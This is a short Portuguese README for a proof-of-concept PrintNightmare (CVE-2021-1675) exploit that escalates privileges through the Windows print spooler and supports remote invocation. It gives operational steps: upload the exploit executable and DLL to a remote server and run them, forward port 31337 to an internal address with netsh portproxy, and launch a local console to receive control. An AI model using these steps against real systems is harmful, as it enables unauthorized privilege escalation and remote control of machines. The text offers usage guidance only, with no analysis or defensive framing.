
Exploit de prova de conceito para CVE-2021-1675 (PrintNightmare) permitindo escalonamento de privilégio local no Windows através do serviço de spooler de impressão, com suporte a invocação remota.
Modificado de https://github.com/sailay1996/PrintNightmare-LPE, suporta chamada remota.
1、Faça upload do PrintNightmareLPE.exe e vlib.dll para o servidor remoto e execute PrintNightmareLPE.exe.
2、Configure o encaminhamento de porta localmente netsh interface portproxy add v4tov4 listenport=31337 connectaddress=192.168.84.129 connectport=31337
3、Inicie xconsole.exe localmente